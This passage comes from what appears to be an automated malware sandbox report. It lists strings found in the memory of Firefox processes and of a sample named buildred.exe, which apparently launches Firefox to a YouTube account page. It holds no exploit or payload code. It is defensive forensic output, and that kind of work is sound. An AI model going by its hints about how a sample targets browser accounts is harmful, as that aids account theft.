(x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2888379941.000002618F03A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows"" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000003.2744972040.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.00000261842C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows? equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2708137723.000001E539280000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2751984387.000001E539282000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =C:=C:\Windows\System32ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =C:=C:\Windows\System32ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsf equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002F.00000002.2855549826.00000130BDB54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2760124251.000001E539530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsfz equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevationN equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account< equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"winsta0\default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\DefaultH equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JSON Viewer's onSave failed in startPersistenceFailed to listen. Callback argument missing.devtools.performance.popup.feature-flagdevtools/client/framework/devtools-browserdevtools.debugger.features.javascript-tracing{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Failed to execute WebChannel callback:No callback set for this channel.and deploy previews URLs are allowed.WebChannel/this._originCheckCallbackresource://devtools/shared/security/socket.js@mozilla.org/network/protocol;1?name=default@mozilla.org/network/protocol;1?name=file@mozilla.org/uriloader/handler-service;1browser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNamesdevtools-commandkey-javascript-tracing-toggleGot invalid request to save JSON datadevtools/client/framework/devtoolsreleaseDistinctSystemPrincipalLoaderUnable to start devtools server on devtools-commandkey-profiler-capture@mozilla.org/dom/slow-script-debug;1DevTools telemetry entry point failed: Failed to listen. Listener already attached.browser and that URL. Falling back to ^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$DevToolsStartup.jsm:handleDebuggerFlagdevtools.debugger.remote-websocketdevtools-commandkey-profiler-start-stopdevtools.performance.recording.ui-base-urlresource://devtools/server/devtools-server.jsgecko.handlerService.defaultHandlersVersionhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%shttps://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/web-handler-app;1https://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/DeferredTask.sys.mjs_injectDefaultProtocolHandlersIfNeededresource://gre/modules/FileUtils.sys.mjs^([a-z+.-]+:\/{0,3})([^\/@]+@).+^([a-z][a-z0-9.+\t-])(:\|;)?(\/\/)?resource://gre/modules/NetUtil.sys.mjshttps://mail.yahoo.co.jp/compose/?To=%s{33d75835-722f-42c0-89cc-44f328e56a86}http://win.mail.ru/cgi-bin/sentmsg?mailto=%sbrowser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAG_FORCE_ALTERNATE_URIhttps://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/?mailto=%sget FIXUP_FLAGS_MAKE_ALTERNATE_URICan't invoke URIFixup in the content processresource://gre/modules/FileUtils.sys.mjs^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]\|$)extractScheme/fixupChangedProtocol<isDownloadsImprovementsAlreadyMigratedhandlerSvc fillHandlerInfo: don't know this typeScheme should be either http or https{c6cf88b7-452e-47eb-bdc9-86e3561648ef}resource://gre/modules/JSONFile.sys.mjs@mozilla.org/network/file-input-stream;1_finalizeInternal/this._finalizePromise<resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjs@mozilla.org/network/async-stream-copier;1Must have a source and a callbacknewChannel requires a single object argumentFirst argument should be an nsIInputStreamresource://gre/modules/JSONFile.sys.mjs@mozilla.org/network/input-stream-pump;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLNon-zero amoun
Source: firefox.exe, 00000028.00000002.2881327122.00000261842A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751624555.00000261842B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2881327122.00000261842A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751624555.00000261842B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account6 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002F.00000002.2851889197.00000130BD7D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account> equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountx equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: PREF_BRANCH_PREVIOUS_ACTIONVALIDATE_FORCE_APPEND_EXTENSION_downloadTypesViewableInternallyshouldViewDownloadInternally_shouldViewDownloadInternally_shouldViewDownloadInternally/<getCombined/overrideFnArray<https://www.youtube.com/accountVALIDATE_GUESS_FROM_EXTENSIONpictureinpicture@mozilla.org equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2760124251.000001E539530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: URL=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: URL=https://www.youtube.com/accountj equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2956306224.000000000854C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Win32_Process7440Win32_Processfirefox.exefirefox.exefirefox.exeWin32_ComputerSystemuser-PCWin32_OperatingSystem10.0.19045Microsoft Windows 10 Pro\|C:\Windows\|\Device\Harddisk0\Partition320240726165726.463452+060C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2922562667.0000026194612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", 